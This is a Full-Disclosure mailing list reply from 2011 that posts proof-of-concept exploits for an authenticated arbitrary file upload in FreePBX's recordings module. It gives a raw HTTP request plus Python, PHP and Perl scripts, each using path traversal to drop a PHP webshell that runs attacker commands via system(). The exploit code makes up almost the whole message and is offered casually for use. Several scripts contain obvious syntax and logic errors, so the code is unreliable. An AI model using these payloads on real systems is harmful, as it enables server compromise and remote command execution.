Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: FreePBX - Module Administration Arbitrary File Upload

From: "-= Glowing Doom =-" <secn3t () gmail com>
Date: Fri, 10 Jun 2011 08:59:40 +1000
Hello...
I wrote a PoC code, for similar bug in this application, about 3months
ago... unfortunately, i did not bother to put it on here because well, it
was nothing much.. but since this 'admin' module has appeared, i will add my
codes to the thing...: this needs for PBX to 'record' ,notsure if an admin
module is needed..it seems to ONLY look for the recordings... anyhow have
fun.. admin i believe :)... nice try to find the sploit guys, i have only
posted it on my blogs and pastebin about 400times in the past 4months... i
guess i will put it here next time.. here is some codes for you..:
-------------------------------------------------------------------------------------------------------
PoC
The HTTP request below illustrates the upload of a phpshell::

POST /admin/config.php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data;
boundary=---------------------------5991806838789183981588991120
Content-Length: 116089

-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="display"

recordings
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="action"

recordings_start
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="usersnum"

../../../../../var/www/html/admin/SpiderLabs
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
Content-Type: application/octet-stream
<?php
/* WebShell code goes here */
?>
-----------------------------5991806838789183981588991120--

OK SO...

In python form:
#!/usr/bin/env python
import urllib, re, os, httplib, urllib2, time, socket, getopt, sys

host = $host
port = 80

s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
s.connectHTTP((host,port))
s.send(
'POST /admin/config.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
'Accept-Language: en-us,en;q=0.5\r\n'
'Accept-Encoding: gzip,deflate\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
'Keep-Alive: 300\r\n'
'Proxy-Connection: keep-alive\r\n'
'Referer: http://&apos; + host + '/admin/config.php\r\n'
'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
'Authorization: Basic base64auth\r\n')
'Content-Type: multipart/form-data;\r\n'
'boundary=---------------------------5991806838789183981588991120\r\n'
'Content-Type: multipart/form-data;\r\n'
'boundary=---------------------------5991806838789183981588991120\r\n'
'Content-Length: 116089\r\n'
'\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="display"\r\n'
'\r\n'
'recordings\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="action"\r\n'
'\r\n'
'recordings_start\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="usersnum"\r\n'
'\r\n'
'../../../../../var/www/html/admin/zmeu.php\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'-----------------------------5991806838789183981588991120--\r\n'

and...

IN php:

<?php
    echo "\n\n";
    echo
"+-------------------------------------------------------------------------+\r\n";
    echo "|        FreePBX 2o11 Remote File Upload Exploit    |\r\n";
    echo "|        Usage: php exploit.php site.com                 |\r\n";
    echo
"+-------------------------------------------------------------------------+\r\n";
    echo "\n";
    echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n";
    $code = trim(fgets(STDIN));
    $socket = @fsockopen($argv[1], 80, $eno, $estr, 10);
    if(!$socket) {
    die("[-] Couldnt connect to: ".$argv[1].". Operation aborted.");
    }
    $part1      =   "POST /admin/config.php HTTP/1.1\r\n";
    $part1     .=   "Host: " . $argv[1] . "\r\n";
    $part1     .=   "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
10.4.6)\r\n";
    $part1     .=   "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $part1     .=   "Accept-Language: en-us,en;q=0.5\r\n";
    $part1     .=   "Accept-Encoding: gzip,deflate\r\n";
    $part1     .=   "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $part1     .=   "Connection: keep-alive\r\n";
    $part1     .=   "Keep-Alive: 300\r\n";
    $part1     .=   "Proxy-Connection: keep-alive\r\n";
    $part1     .=   "Referer: http://10.1.1.1/admin/config.php\r\n";;
    $part1     .=   "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
    $part1     .=   "Authorization: Basic base64auth\r\n";
    $part1     .=   "Content-Type : multipart/form-data;\r\n";
    $part2      =
"boundary=-----------------------------5991806838789183981588991120--\r\n";
    $part1     .=   "Content-Type : multipart/form-data;\r\n";
    $part2      =
"boundary=-----------------------------5991806838789183981588991120--\r\n";
    $part2      =   "Content-Length: 116089\r\n";
    $part2     .=   "\r\n";
    $part2     .=
"-----------------------------5991806838789183981588991120\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"display\"\r\n";
    $part2     .=   "\r\n";
    $part2     .=   "recordings\r\n";
    $part2     .=
"---------------------------5991806838789183981588991120\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"action\"\r\n";
    $part2     .=   "\r\n";
    $part2     .=   "recordings_start\r\n";
    $part2     .=
"---------------------------5991806838789183981588991120\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"usersnum\"\r\n";
    $part2     .=   "\r\n";
    $part2     .=   "Content-Disposition: form-data;
name=\"../../../../../var/www/html/admin/xd\"\r\n";
    $part2     .=
"---------------------------5991806838789183981588991120\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"ivrfile\";
filename=\"shell.php\"\r\n";
    $part2     .=   "Content-Type: application/octet-stream\r\n";
    $part2     .=   "\r\n";
    $part2     .=   "<?php echo \'<pre>\' + system(\'$code\') + \'</pre>\';
?>\r\n";
    $part2     .=
"-----------------------------5991806838789183981588991120--\r\n";
    $part1     .=   $part2;
    fwrite($socket, $part1);
    echo "[!] Check the upload folder (/var/www/html/admin/xd) ..";
    } else {
    echo "\n\n";
    echo "+---------------------------------------------------+\r\n";
    echo "|      Usage: php exploit.php site.com  |\r\n";
    echo "+---------------------------------------------------+\r\n";
    echo "\n\n";
}
?>

and in perl..

#!/usr/bin/perl
use IO::Socket::INET;
use Crypt::SSLeay;
use Net::SSL;

sub usage {
print "perl $0 <Host> <Cmd>\n";
exit(1);
}
my($host, $cmd) = @ARGV or usage();
print "[+] Connecting to host...\n";
my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort
=> 80,Timeout => 10) or die "[-] Connect error..\n";
if(!sock) {
print "[-] Non-SSL PBX NOT HERE!\n";
exit(-1);
else {
$sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort =>
443,Timeout => 10) or die "[-] Connect error..\n";
print "[-] SSL PBX NOT HERE!\n";
exit(-1);
}
print "[+] Connected.. Sending Buffer\n";
my $temp=
"POST /admin/config.php HTTP/1.1\n".
"Host: $host:80/\n".
"User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n".
"Accept-Language: en-us,en;q=0.5\n".
"Accept-Encoding: gzip,deflate\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n".
"Keep-Alive: 300\n".
"Proxy-Connection: keep-alive\n".
"Referer: http://$host/admin/config.php\n";.
"Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n".
"Authorization: Basic base64auth\n".
"Connection: keep-alive\n".
"Content-Type : multipart/form-data;\n".
"---------------------------5991806838789183981588991120\n".
"Content-Length: 116089\n".
"\n".
"Content-Disposition: form-data; name=\"display\"\n".
"recordings\n".
"\n".
"---------------------------5991806838789183981588991120\n".
"Content-Disposition: form-data; name=\"action\"\n".
"recordings_start\n".
"\n".
"---------------------------5991806838789183981588991120\n".
"Content-Disposition: form-data; name=\"usersnum\"\n".
"\n".
"---------------------------5991806838789183981588991120\n".
"Content-Disposition: form-data;
name=\"../../../../../var/www/html/admin/xd\"\n".
"Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n".
"Content-Type: application/octet-stream\n".
"\n".
"<?php ". $cmd ." ?>\n".
"-----------------------------5991806838789183981588991120--\n\n";

print "[+] Sent file 'shell.php' to act as webshell ..\n";
my $buffer_size=length($temp);
$temp;
my $answer=0;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock) {
print "[+] Buffer sent..running command: $cmd ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[!] Server reply: $answer ..\n";
}
}
}

have fun! Perl one is abit rough..
dru

xd @ #haxNET @ Efnet

(National LULZ day is here!)

And for those guys who 'exploited' it... this PoC was released like 3months
ago... what the hell are yu guiys on about, and where is even a HEADER
showing explotation :S seems you have started a group but forgot to check
this for previous bugs :) hehe... nomatter, it is now debugged for you.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: